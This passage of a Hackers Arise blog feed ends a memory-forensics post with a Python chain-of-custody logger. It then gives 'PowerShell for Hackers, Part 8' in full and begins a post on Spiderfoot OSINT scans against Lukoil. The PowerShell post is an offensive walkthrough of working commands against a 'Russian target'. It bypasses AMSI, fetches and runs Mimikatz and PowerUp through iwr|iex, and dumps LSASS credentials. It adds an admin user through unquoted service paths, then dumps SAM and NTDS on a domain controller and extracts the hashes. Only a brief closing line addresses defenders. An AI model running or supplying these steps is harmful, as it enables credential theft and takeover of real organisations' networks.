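        "tools": tool_versions(),
    }
    with log.open("a", encoding="utf-8") as fh:
        fh.write(json.dumps(record) + "\n")
    return record

def read_log(log: PathLike) -> List[Dict[str, object]]:
    """Load every record back, e.g. to build the command/timestamp table for the report."""
    lines = Path(log).read_text(encoding="utf-8").splitlines()
    return [json.loads(line) for line in lines if line.strip()]

def main() -> None:
    # Assumed file names; the plugin order follows the walkthrough above.
    image, log = "infected.vmem", "custody.jsonl"
    steps = [("windows.info", ()), ("windows.pslist", ()), ("windows.pstree", ()),
             ("windows.cmdline", ()), ("windows.handles", ("--pid", "2732")),
             ("windows.filescan", ())]
    for plugin, args in steps:
        rec = run_logged(vol_cmd(image, plugin, *args), image, log, note=plugin)
        print(f"{plugin}: rc={rec['returncode']} image_unchanged={rec['image_unchanged']}")

if __name__ == "__main__":
    main()
```

Run it inside the virtual environment where <code>vol</code> is installed; a record whose <code>image_unchanged</code> is false means something wrote to the evidence file during the run and the step must be investigated before its output is trusted.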
  787.  
  788.  
  789.  
  790. <h2 class="wp-block-heading"><strong>Summary</strong></h2>
  791.  
  792.  
  793.  
  794. <p>Think of memory as the attacker’s black box. It often holds the fleeting traces disk images miss, things like unpacked code, live network sockets, and cryptographic keys. Prioritizing memory first allows you to catch those traces before they’re gone. Volatility can help you list running processes, trace parent–child chains, and inspect handles and command lines. You can also dump in-memory binaries and use them as artifacts for a more thorough analysis. Submitting these artifacts to sandboxes gives you a clear picture of what happened on your network, along with valuable IOCs and the techniques used, so you can prevent the attack from recurring. As a forensic analyst you are required to preserve the image intact, work with suspicious files in an isolated lab, and write down every command and timestamp to keep the chain of custody reliable and your actions repeatable.</p>
  795.  
  796.  
  797.  
  798. <p>If you need forensic assistance, we offer professional services to help investigate and mitigate incidents. Additionally, we provide classes on digital forensics for those looking to expand their skills and understanding in this field.</p>
  799.  
  800.  
  801.  
  803.  
  804.  
  805.  
  806. <p>For more Memory Forensics, check out our upcoming Memory Forensics class.</p>
  807.  
  808.  
  809.  
  810. <p>The post <a href="https://hackers-arise.com/digital-forensics-investigating-a-ransomware-attack/">Digital Forensics: Investigating a Ransomware Attack</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></content:encoded>
  811. </item>
  812. <item>
  813. <title>PowerShell for Hackers, Part 8: Privilege Escalation and Organization Takeover</title>
  814. <link>https://hackers-arise.com/powershell-for-hackers-privilege-escalation-and-organization-takeover/</link>
  815. <dc:creator><![CDATA[Co11ateral]]></dc:creator>
  816. <pubDate>Wed, 08 Oct 2025 14:49:57 +0000</pubDate>
  817. <category><![CDATA[Cybersecurity Tools]]></category>
  818. <category><![CDATA[Cyberwar]]></category>
  819. <category><![CDATA[Cyberwarrior]]></category>
  820. <category><![CDATA[Hacking]]></category>
  821. <category><![CDATA[Powershell]]></category>
  822. <category><![CDATA[Windows]]></category>
  823. <category><![CDATA[Active Directory]]></category>
  824. <category><![CDATA[AMSI bypass]]></category>
  825. <category><![CDATA[automation]]></category>
  826. <category><![CDATA[credential dumping]]></category>
  827. <category><![CDATA[domain takeover]]></category>
  828. <category><![CDATA[Evil-WinRM]]></category>
  829. <category><![CDATA[HACKING]]></category>
  830. <category><![CDATA[lateral-movement]]></category>
  831. <category><![CDATA[Mimikatz]]></category>
  832. <category><![CDATA[NTDS]]></category>
  833. <category><![CDATA[offensive-security]]></category>
  834. <category><![CDATA[OPSEC]]></category>
  835. <category><![CDATA[OSINT]]></category>
  836. <category><![CDATA[post-exploitation]]></category>
  837. <category><![CDATA[PowerShell]]></category>
  838. <category><![CDATA[PowerUp]]></category>
  839. <category><![CDATA[privilege escalation]]></category>
  840. <category><![CDATA[red-team]]></category>
  841. <category><![CDATA[SAM]]></category>
  842. <category><![CDATA[unquoted-service-path]]></category>
  843. <guid isPermaLink="false">https://hackers-arise.com/?p=18578</guid>
  844.  
  845. <description><![CDATA[<p>Use AMSI bypasses, Mimikatz, and PowerUp to escalate from a single foothold into full domain compromise</p>
  846. <p>The post <a href="https://hackers-arise.com/powershell-for-hackers-privilege-escalation-and-organization-takeover/">PowerShell for Hackers, Part 8: Privilege Escalation and Organization Takeover</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></description>
  847. <content:encoded><![CDATA[<p>Welcome back, hackers!</p>
  848.  
  849.  
  850.  
  851. <p>For quite some time we have been covering the different ways PowerShell can be used by hackers. We learned the basics of reconnaissance, persistence methods, survival techniques, evasion tricks, and mayhem methods. Today we are continuing our study of PowerShell and learning how to automate it for real hacking tasks such as privilege escalation, AMSI bypass, and dumping credentials. As you can see, PowerShell can be used to exploit systems, although it was never created for this purpose. Our goal is to make it simple for you to automate exploitation during pentests. Things that are usually done manually can be automated with the help of the scripts we are going to cover. Let’s start by learning about AMSI.</p>
  852.  
  853.  
  854.  
  855. <h2 class="wp-block-heading"><strong>AMSI Bypass</strong></h2>
  856.  
  857.  
  858.  
  859. <h3 class="wp-block-heading"><strong>Repo:</strong></h3>
  860.  
  861.  
  862.  
  863. <p><a href="https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell">https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell</a></p>
  864.  
  865.  
  866.  
  867. <p>AMSI is the Antimalware Scan Interface. It is a Windows feature that sits between script engines like PowerShell or Office macros and whatever antivirus or EDR product is installed on the machine. When a script or a payload is executed, the runtime hands that content to AMSI so the security product can scan it before anything dangerous runs. It makes scripts and memory activity visible to security tools, which raises the bar for simple script-based attacks and malware. Hackers constantly try to find ways to keep malicious content from ever being presented to it, or to change the content so it won’t match detection rules. You will see many articles and tools that claim to bypass AMSI, but soon after they are released, Microsoft patches the vulnerabilities. Since it’s important to be familiar with this attack, let’s test our system and try to patch AMSI.</p>
  868.  
  869.  
  870.  
  871. <p>First we need to check whether Defender is running on the Russian target:</p>
  872.  
  873.  
  874.  
  875. <p><code>PS &gt; Get-WmiObject -Class Win32_Service -Filter "Name='WinDefend'"</code></p>
  876.  
  877.  
  878.  
  879. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="170" src="https://hackers-arise.com/wp-content/uploads/2025/10/1-showing-the-defender-is-running-1024x170.webp" alt="checking if the defender is running on windows" class="wp-image-18579" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/1-showing-the-defender-is-running-1024x170.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/1-showing-the-defender-is-running-300x50.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/1-showing-the-defender-is-running-768x127.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/1-showing-the-defender-is-running.webp 1079w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  880.  
  881.  
  882.  
  883. <p>And it is. If it was off, we would not need any AMSI bypass and could jump straight to our explorations.</p>
  884.  
  885.  
  886.  
  887. <h3 class="wp-block-heading"><strong>Patching AMSI</strong></h3>
  888.  
  889.  
  890.  
  891. <p>Next, we start patching AMSI with the help of our script, which you can find at the following link:</p>
  892.  
  893.  
  894.  
  895. <p><a href="https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/shantanukhande-amsi.ps1">https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/shantanukhande-amsi.ps1</a></p>
  896.  
  897.  
  898.  
  899. <p>As you know by now, there are a few ways to execute scripts in PowerShell. We will use a basic one for demonstration purposes:</p>
  900.  
  901.  
  902.  
  903. <p><code>PS &gt; .\shantanukhande-amsi.ps1</code></p>
  904.  
  905.  
  906.  
  907. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="370" src="https://hackers-arise.com/wp-content/uploads/2025/10/2-patching-amsi-1024x370.webp" alt="patching amsi with a powershell script" class="wp-image-18580" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/2-patching-amsi-1024x370.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/2-patching-amsi-300x108.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/2-patching-amsi-768x277.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/2-patching-amsi.webp 1127w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  908.  
  909.  
  910.  
  911. <p>If your output matches ours, AMSI has been successfully patched. From now on, Defender has no visibility into your PowerShell session, and scripts can be executed in it without restriction. It’s important to mention that some articles on AMSI bypass will tell you that downgrading to PowerShell version 2 helps to evade detection, but that is not true, at least not anymore. Defender actively monitors all of your sessions, and such simple tricks will not work.</p>
  912.  
  913.  
  914.  
  915. <h2 class="wp-block-heading"><strong>Dumping Credentials with Mimikatz</strong></h2>
  916.  
  917.  
  918.  
  919. <h3 class="wp-block-heading"><strong>Repo:</strong></h3>
  920.  
  921.  
  922.  
  923. <p><a href="http://raw.githubusercontent.com/g4uss47/Invoke-Mimikatz/refs/heads/master/Invoke-Mimikatz.ps1">http://raw.githubusercontent.com/g4uss47/Invoke-Mimikatz/refs/heads/master/Invoke-Mimikatz.ps1</a></p>
  924.  
  925.  
  926.  
  927. <p>Since you are free to run anything you want, we can execute Mimikatz right in our session. Note that we are using Invoke-Mimikatz.ps1 by g4uss47, an updated PowerShell version of Mimikatz that actually works. For OPSEC reasons we do not recommend running Mimikatz commands that touch other hosts, because network security products might pick this up. Instead, let’s dump LSASS locally and inspect the results:</p>
  928.  
  929.  
  930.  
  931. <p><code>PS &gt; iwr http://raw.githubusercontent.com/g4uss47/Invoke-Mimikatz/refs/heads/master/Invoke-Mimikatz.ps1 | iex</code></p>
  932.  
  933.  
  934.  
  935. <p><code>PS &gt; Invoke-Mimikatz -DumpCreds</code></p>
  936.  
  937.  
  938.  
  939. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="915" height="438" src="https://hackers-arise.com/wp-content/uploads/2025/10/3-dumping-hashes-with-mimikatz.webp" alt="dumping lsass with mimikatz powershell script Invoke-Mimikatz.ps1" class="wp-image-18581" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/3-dumping-hashes-with-mimikatz.webp 915w, https://hackers-arise.com/wp-content/uploads/2025/10/3-dumping-hashes-with-mimikatz-300x144.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/3-dumping-hashes-with-mimikatz-768x368.webp 768w" sizes="(max-width: 915px) 100vw, 915px" /></figure>
  940.  
  941.  
  942.  
  943. <p>Now we have the credentials of brandmanager. If we compromised a more valuable target in the domain, like a server or a database, we could expect domain admin credentials. You will see this quite often.</p>
  944.  
  945.  
  946.  
  947. <h2 class="wp-block-heading"><strong>Privilege Escalation with PowerUp</strong></h2>
  948.  
  949.  
  950.  
  951. <p>Privilege escalation is a complex topic. Systems are frequently misconfigured, and their owners feel comfortable without realizing that security risks exist. This may allow you to skip privilege escalation altogether and jump straight to lateral movement, since the compromised user already has high privileges. There are multiple privilege escalation vectors, but among the most common are unquoted service paths and insecure file permissions. While insecure file permissions can easily be abused by replacing the legitimate file with a malicious one of the same name, unquoted service paths may require more work for a beginner. That’s why we will cover this attack today with the help of PowerUp. Before we proceed, it’s important to mention that this script has been known to security products for a long time, so be careful.</p>
  952.  
  953.  
  954.  
  955. <h3 class="wp-block-heading"><strong>Finding Vulnerable Services</strong></h3>
  956.  
  957.  
  958.  
  959. <p>An unquoted service path is a configuration mistake in Windows services where the full path to the service executable contains spaces but is not wrapped in quotation marks. Because Windows treats spaces as separators when resolving such a path, an unquoted path like <code>C:\Program Files\My Service\service.exe</code> can be interpreted ambiguously. The system may try to launch an executable at earlier, shorter segments of that path (for example <code>C:\Program.exe</code> or <code>C:\Program Files\My.exe</code>) before reaching the intended <code>service.exe</code>. A hacker can place their own executable at one of those earlier locations, and the system will run that program instead of the real service binary. This works as a privilege escalation method because services typically run with higher privileges.</p>
  960.  
  961.  
  962.  
  963. <p>Let’s run PowerUp and find vulnerable services:</p>
  964.  
  965.  
  966.  
  967. <p><code>PS &gt; iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/refs/heads/master/Privesc/PowerUp.ps1 | iex</code></p>
  968.  
  969.  
  970.  
  971. <p><code>PS &gt; Get-UnquotedService</code></p>
  972.  
  973.  
  974.  
  975. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="950" height="422" src="https://hackers-arise.com/wp-content/uploads/2025/10/4-found-vulnerable-services-for-privilege-escalation.webp" alt="listing vulnerable unquoted services to privilege escalation" class="wp-image-18582" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/4-found-vulnerable-services-for-privilege-escalation.webp 950w, https://hackers-arise.com/wp-content/uploads/2025/10/4-found-vulnerable-services-for-privilege-escalation-300x133.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/4-found-vulnerable-services-for-privilege-escalation-768x341.webp 768w" sizes="(max-width: 950px) 100vw, 950px" /></figure>
  976.  
  977.  
  978.  
  979. <p>Now let’s test the service names and see which one will get us local admin privileges:</p>
  980.  
  981.  
  982.  
  983. <p><code>PS &gt; Invoke-ServiceAbuse -Name 'Service Name'</code></p>
  984.  
  985.  
  986.  
  987. <p>If successful, you should see the name of the abused service and the command it executed. By default, the script creates a user named john and adds it to the local Administrators group. You can edit it to fit your needs.</p>
  988.  
  989.  
  990.  
  991. <p>The results can be tested:</p>
  992.  
  993.  
  994.  
  995. <p><code>PS &gt; net user john</code></p>
  996.  
  997.  
  998.  
  999. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="814" height="354" src="https://hackers-arise.com/wp-content/uploads/2025/10/5-escalated-privileges-on-windows-with-powerup.webp" alt="abusing an unqouted service with the help of PowerUp.ps1" class="wp-image-18583" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/5-escalated-privileges-on-windows-with-powerup.webp 814w, https://hackers-arise.com/wp-content/uploads/2025/10/5-escalated-privileges-on-windows-with-powerup-300x130.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/5-escalated-privileges-on-windows-with-powerup-768x334.webp 768w" sizes="(max-width: 814px) 100vw, 814px" /></figure>
  1000.  
  1001.  
  1002.  
  1003. <p>Now we have an admin user on this machine, which can be used for various purposes.</p>
  1004.  
  1005.  
  1006.  
  1007. <h2 class="wp-block-heading"><strong>Attacking NTDS and SAM</strong></h2>
  1008.  
  1009.  
  1010.  
  1011. <h3 class="wp-block-heading"><strong>Repo:</strong></h3>
  1012.  
  1013.  
  1014.  
  1015. <p><a href="https://github.com/soupbone89/Scripts/tree/main/NTDS-SAM%20Dumper">https://github.com/soupbone89/Scripts/tree/main/NTDS-SAM%20Dumper</a></p>
  1016.  
  1017.  
  1018.  
  1019. <p>With enough privileges we can dump NTDS and SAM without having to deal with security products at all, using only native Windows functions. Usually these attacks require multiple commands, since dumping only NTDS or only the SAM hive is not enough on its own. For this reason, we have added a new script to our repository. It automatically identifies the type of host it is running on and dumps the needed files. NTDS only exists on Domain Controllers and contains the credentials of all Active Directory users; this file cannot be found on regular machines. Regular machines are instead exploited by dumping their SAM and SYSTEM hives. The script is not flagged by any AV product. Below you can see how it works.</p>
  1020.  
  1021.  
  1022.  
  1023. <h3 class="wp-block-heading"><strong>Attacking SAM on Domain Machines</strong></h3>
  1024.  
  1025.  
  1026.  
  1027. <p>To avoid issues, bypass the execution policy:</p>
  1028.  
  1029.  
  1030.  
  1031. <p><code>PS &gt; powershell -ep bypass</code></p>
  1032.  
  1033.  
  1034.  
  1035. <p>Then dump SAM and SYSTEM hives:</p>
  1036.  
  1037.  
  1038.  
  1039. <p><code>PS &gt; .\ntds.ps1</code></p>
  1040.  
  1041.  
  1042.  
  1043. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="1003" height="446" src="https://hackers-arise.com/wp-content/uploads/2025/10/6-dumping-sam.webp" alt="dumping sam and system hives with ntds.ps1" class="wp-image-18584" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/6-dumping-sam.webp 1003w, https://hackers-arise.com/wp-content/uploads/2025/10/6-dumping-sam-300x133.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/6-dumping-sam-768x342.webp 768w" sizes="(max-width: 1003px) 100vw, 1003px" /></figure>
  1044.  
  1045.  
  1046.  
  1047. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="874" height="327" src="https://hackers-arise.com/wp-content/uploads/2025/10/7-listing-sam-and-system-hive-dumps.webp" alt="listing sam and system hive dumps" class="wp-image-18585" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/7-listing-sam-and-system-hive-dumps.webp 874w, https://hackers-arise.com/wp-content/uploads/2025/10/7-listing-sam-and-system-hive-dumps-300x112.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/7-listing-sam-and-system-hive-dumps-768x287.webp 768w" sizes="(max-width: 874px) 100vw, 874px" /></figure>
  1048.  
  1049.  
  1050.  
  1051. <p>Wait a few seconds and find your files in C:\Temp. If the directory does not exist, it will be created by the script.</p>
  1052.  
  1053.  
  1054.  
  1055. <p>Next we need to exfiltrate these files and extract the credentials:</p>
  1056.  
  1057.  
  1058.  
  1059. <p><code>bash$ &gt; secretsdump.py -sam SAM -system SYSTEM LOCAL</code></p>
  1060.  
  1061.  
  1062.  
  1063. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="350" src="https://hackers-arise.com/wp-content/uploads/2025/10/8-extracting-the-credentials-from-the-sam-dump-1024x350.webp" alt="extracting creds from sam hive" class="wp-image-18586" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/8-extracting-the-credentials-from-the-sam-dump-1024x350.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/8-extracting-the-credentials-from-the-sam-dump-300x103.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/8-extracting-the-credentials-from-the-sam-dump-768x263.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/8-extracting-the-credentials-from-the-sam-dump.webp 1471w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  1064.  
  1065.  
  1066.  
  1067. <h3 class="wp-block-heading"><strong>Attacking NTDS on Domain Controllers</strong></h3>
  1068.  
  1069.  
  1070.  
  1071. <p>If you have already compromised a domain admin, or managed to escalate your privileges on the Domain Controller, you might want to get the credentials of all users in the company.</p>
  1072.  
  1073.  
  1074.  
  1075. <p>We often use Evil-WinRM to avoid unnecessary GUI interactions that are easy to spot. Evil-WinRM allows you to load all your scripts from your own machine, so they are executed in memory without touching the target’s disk. It can also patch AMSI, but be really careful.</p>
  1076.  
  1077.  
  1078.  
  1079. <p>Connect to the DC:</p>
  1080.  
  1081.  
  1082.  
  1083. <p><code>c2 &gt; evil-winrm -i DC -u admin -p password -s '/home/user/scripts/'</code></p>
  1084.  
  1085.  
  1086.  
  1087. <p>Now you can execute your scripts:</p>
  1088.  
  1089.  
  1090.  
  1091. <p><code>PS &gt; ntds.ps1</code></p>
  1092.  
  1093.  
  1094.  
  1095. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="461" src="https://hackers-arise.com/wp-content/uploads/2025/10/9-dumping-ntds-on-a-dc-1024x461.webp" alt="dumping NTDS with ntds.ps1 script" class="wp-image-18587" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/9-dumping-ntds-on-a-dc-1024x461.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/9-dumping-ntds-on-a-dc-300x135.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/9-dumping-ntds-on-a-dc-768x346.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/9-dumping-ntds-on-a-dc.webp 1171w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  1096.  
  1097.  
  1098.  
  1099. <p>Evil-WinRM has a download command that can help you extract the files. After that, run this command:</p>
  1100.  
  1101.  
  1102.  
  1103. <p><code>bash$ &gt; secretsdump.py -ntds ntds.dit -sam SAM -system SYSTEM LOCAL</code></p>
  1104.  
  1105.  
  1106.  
  1107. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="513" src="https://hackers-arise.com/wp-content/uploads/2025/10/10-extracting-ntds-hashes-1024x513.webp" alt="extracting creds from the ntds dump" class="wp-image-18588" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/10-extracting-ntds-hashes-1024x513.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/10-extracting-ntds-hashes-300x150.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/10-extracting-ntds-hashes-768x385.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/10-extracting-ntds-hashes.webp 1476w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  1108.  
  1109.  
  1110.  
  1111. <h2 class="wp-block-heading"><strong>Summary</strong></h2>
  1112.  
  1113.  
  1114.  
  1115. <p>In this chapter, we explored how PowerShell can be used for privilege escalation and complete domain compromise. We began by bypassing AMSI to clear the way for running offensive scripts without interference, then moved on to credential dumping with Mimikatz. From there, we looked at privilege escalation techniques such as unquoted service paths with PowerUp, followed by dumping the NTDS and SAM databases once higher privileges were achieved. Each step builds on the previous one, showing how hackers chain small misconfigurations into full organizational takeover. Defenders should also be familiar with these attacks, as it will help them tune their security products. For instance, seemingly harmless actions such as creating a shadow copy to dump NTDS and SAM can be spotted if you monitor Event ID 8193 and Event ID 12298. Many activities can be monitored, even benign ones. It depends on where defenders are looking.</p><p>The post <a href="https://hackers-arise.com/powershell-for-hackers-privilege-escalation-and-organization-takeover/">PowerShell for Hackers, Part 8: Privilege Escalation and Organization Takeover</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></content:encoded>
  1116. </item>
  1117. <item>
  1118. <title>Getting Started with the Raspberry Pi for Hacking: Using Spiderfoot for OSINT Data Gathering</title>
  1119. <link>https://hackers-arise.com/getting-started-with-the-raspberry-pi-for-hacking-using-spiderfoot-for-osint-data-gathering/</link>
  1120. <dc:creator><![CDATA[aircorridor]]></dc:creator>
  1121. <pubDate>Tue, 07 Oct 2025 14:48:38 +0000</pubDate>
  1122. <category><![CDATA[OSINT & Reconnaissance]]></category>
  1123. <category><![CDATA[Raspberry Pi]]></category>
  1124. <guid isPermaLink="false">https://hackers-arise.com/?p=18442</guid>
  1125.  
  1126. <description><![CDATA[<p>Welcome back, aspiring hackers! Raspberry Pi is a great starting point for exploring cybersecurity and hacking in particular. You can grab a $50 board, connect it to the TV, and start learning. Otherwise, you can install the OS&#160;on the Pi and control it from your phone. There are a lot of opportunities. In this article, [&#8230;]</p>
  1127. <p>The post <a href="https://hackers-arise.com/getting-started-with-the-raspberry-pi-for-hacking-using-spiderfoot-for-osint-data-gathering/">Getting Started with the Raspberry Pi for Hacking: Using Spiderfoot for OSINT Data Gathering</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></description>
  1128. <content:encoded><![CDATA[<p>Welcome back, aspiring hackers!</p>
  1129.  
  1130.  
  1131.  
  1132. <p>Raspberry Pi is a great starting point for exploring cybersecurity and hacking in particular. You can grab a $50 board, connect it to the TV, and start learning. Otherwise, you can install the OS&nbsp;on the Pi and control it from your phone. There are a lot of opportunities.</p>
  1133.  
  1134.  
  1135.  
  1136. <p>In this article, I&#8217;d like to demonstrate how to use a Raspberry Pi for Open Source Intelligence (OSINT) gathering. This is a key reconnaissance step before an attack.</p>
  1137.  
  1138.  
  1139.  
  1140. <h2 class="wp-block-heading">Step #1: Understand Where to Start</h2>
  1141.  
  1142.  
  1143.  
  1144. <p>There is a wealth of OSINT tools—some have faded away, while new ones constantly emerge. Spiderfoot, for example, has been quietly serving OSINT investigators since 2012.</p>
  1145.  
  1146.  
  1147.  
  1148. <p>This tool serves as a starting point in the investigation. It is capable of gathering information from multiple resources automatically with little or no manual interaction. Once this data has been gathered, you can export the results in CSV/JSON or feed scan data to Splunk/ElasticSearch.</p>
  1149.  
  1150.  
  1151.  
  1152. <h2 class="wp-block-heading">Step #2: Getting Started with Spiderfoot</h2>
  1153.  
  1154.  
  1155.  
  1156. <p>In the previous article we installed Kali Linux on a Raspberry Pi, which comes with Spiderfoot pre-installed. Let’s take a look at its help page:</p>
  1157.  
  1158.  
  1159.  
  1160. <p><strong><code>kali&gt; spiderfoot -h</code></strong></p>
  1161.  
  1162.  
  1163.  
  1164. <figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="882" height="416" src="https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_help.webp" alt="" class="wp-image-18446" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_help.webp 882w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_help-300x141.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_help-768x362.webp 768w" sizes="(max-width: 882px) 100vw, 882px" /></figure>
  1165.  
  1166.  
  1167.  
  1168. <p>To get started, it is enough to run the following command:<br><strong><code>kali&gt; spiderfoot -l 0.0.0.0:4444</code></strong></p>
  1169.  
  1170.  
  1171.  
  1172. <figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="892" height="356" src="https://hackers-arise.com/wp-content/uploads/2025/09/spyderfoot_start_the_server.webp" alt="" class="wp-image-18447" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/spyderfoot_start_the_server.webp 892w, https://hackers-arise.com/wp-content/uploads/2025/09/spyderfoot_start_the_server-300x120.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/spyderfoot_start_the_server-768x307.webp 768w" sizes="(max-width: 892px) 100vw, 892px" /></figure>
  1173.  
  1174.  
  1175.  
  1176. <p>Where</p>
  1177.  
  1178.  
  1179.  
  1180. <p><strong>-l</strong> &#8211; tells Spiderfoot to listen for incoming HTTP connections;<br><strong>0.0.0.0:4444</strong> &#8211; the address and port where the web UI will be bound. 0.0.0.0 means &#8220;any reachable IP on this machine,&#8221; so you can reach the UI from another host on the same network.</p>
  1181.  
  1182.  
  1183.  
  1184. <p>By browsing to http://&lt;IP&gt;:4444/ from any computer or phone on the same Local Area Network (LAN), anyone on that network can reach the Spiderfoot user interface.</p>
  1185.  
  1186.  
  1187.  
  1188. <figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="961" height="383" src="https://hackers-arise.com/wp-content/uploads/2025/09/spyderfoot_ui.webp" alt="" class="wp-image-18449" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/spyderfoot_ui.webp 961w, https://hackers-arise.com/wp-content/uploads/2025/09/spyderfoot_ui-300x120.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/spyderfoot_ui-768x306.webp 768w" sizes="(max-width: 961px) 100vw, 961px" /></figure>
  1189.  
  1190.  
  1191.  
  1192. <h2 class="wp-block-heading">Step #3: Spiderfoot Modules</h2>
  1193.  
  1194.  
  1195.  
  1196. <p>By default, Spiderfoot includes more than 200 modules, most of which operate without any API keys. However, adding the appropriate API keys in the settings can significantly boost the effectiveness of your scans.</p>
  1197.  
  1198.  
  1199.  
  1200. <figure class="wp-block-image aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="598" src="https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_intelx_api-1024x598.webp" alt="" class="wp-image-18450" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_intelx_api-1024x598.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_intelx_api-300x175.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_intelx_api-768x449.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_intelx_api.webp 1167w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  1201.  
  1202.  
  1203.  
  1204. <h2 class="wp-block-heading">Step #4: Start Scanning</h2>
  1205.  
  1206.  
  1207.  
  1208. <p>SpiderFoot offers four primary scan types:</p>
  1209.  
  1210.  
  1211.  
  1212. <p><strong>All:</strong> Runs every available module. Comprehensive but time-consuming, and may generate excessive queries.</p>
  1213.  
  1214.  
  1215.  
  1216. <p><strong>Footprint:</strong> Lighter scan focusing on infrastructure and digital footprint.</p>
  1217.  
  1218.  
  1219.  
  1220. <p><strong>Investigate:</strong> Some basic footprinting will be performed in addition to querying of blacklists and other sources that may have information about your target&#8217;s maliciousness.</p>
  1221.  
  1222.  
  1223.  
  1224. <p><strong>Passive:</strong> Gathering information without touching the target or their affiliates.</p>
  1225.  
  1226.  
  1227.  
  1228. <p>Let&#8217;s run a “stealth” scan against the Russian oil company&nbsp;<strong>Lukoil</strong>. Once the scan completes, the&nbsp;<strong>Summary</strong>&nbsp;tab on the main screen will display an overview of the information that was uncovered.</p>
  1229.  
  1230.  
  1231.  
  1232. <figure class="wp-block-image aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="648" src="https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_scan_results-1024x648.webp" alt="" class="wp-image-18451" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_scan_results-1024x648.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_scan_results-300x190.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_scan_results-768x486.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_scan_results.webp 1180w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  1233.  
  1234.  
  1235.  
  1236. <p>By clicking the Browse tab, we can review the results.</p>
  1237.  
  1238.  
  1239.  
